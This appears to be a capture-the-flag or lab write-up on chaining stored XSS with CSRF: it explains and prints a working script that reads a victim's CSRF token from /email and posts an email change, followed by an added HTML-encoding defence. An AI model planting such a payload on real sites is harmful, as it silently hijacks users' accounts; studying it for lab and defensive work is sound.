Exploiting XSS to perform CSRF.txt
Exploiting XSS to perform CSRF
No XSS popups this time; we're going for a silent XSS that does its work without the victim noticing.
Again, the comment section renders what we submit as HTML, so it will run our JS code.
The code provided in the lab solution is very good as it is; I'll just explain the parts that might not make sense:
req.open('get','/email',true);
req.send();
Sends a same-origin GET to /email, the page where the user can change their email address (and which therefore contains the change-email form).
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
Takes the response text of that request to /email, finds the CSRF token in the markup and uses the regex capture group (\w+) to pull out its value. More on \w here:
https://www.w3schools.com/Jsref/jsref_regexp_wordchar.asp
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
Sends the POST that changes the email address, carrying the stolen CSRF token and the new address we want to set.
Script:
<script>
// Step 1: same-origin GET for /email, the page that holds the change-email form.
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/email', true);
req.send();

function handleResponse() {
  // Step 2: pull the CSRF token out of the form in the /email response.
  var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
  // Step 3: submit the change-email form with that token and our address.
  var changeReq = new XMLHttpRequest();
  changeReq.open('post', '/email/change-email', true);
  changeReq.send('csrf=' + token + '&email=test@test.com');
}
</script>
Just paste it in the comments and it should be enough.
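Added defender-side example, not part of this writeup or the lab solution: the chain above only works because the comment is inserted into the page unencoded, and a CSRF token in the page source is readable by any script running on the same origin, so the token by itself gives no protection. HTML-encoding the comment body before it is rendered turns the payload into inert text; the function names and the sample input are my own.

```javascript
// Added example (not from the writeup or the lab): HTML-encode stored
// comments so an injected <script> is rendered as text, never executed.
// Function names are assumptions for illustration.

// The payload from the writeup, constructed here as test input.
const XSS_PAYLOAD =
  '<script>' +
  'var req = new XMLHttpRequest();' +
  "req.open('get','/email',true);" +
  'req.send();' +
  '</script>';

// Encode the five characters that can break out of an HTML text context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Build the comment markup the way a safe template would: the
// user-controlled author and body are only ever inserted encoded.
function renderComment(author, body) {
  return '<div class="comment"><b>' + escapeHtml(author) + '</b>: ' +
         escapeHtml(body) + '</div>';
}

// True if the user-controlled part of the rendered fragment still holds a
// raw '<' or '>', i.e. encoding failed. A unit check, not a sanitizer.
function containsRawTag(html) {
  // Strip the fixed wrapper we generated, leaving only the encoded content.
  const inner = html.replace(/^<div class="comment"><b>/, '')
                    .replace(/<\/b>: /, '')
                    .replace(/<\/div>$/, '');
  return /[<>]/.test(inner);
}
```

With encoding in place the browser shows the literal text of the script in the comment, the XHR never runs, and the CSRF token in /email is never read.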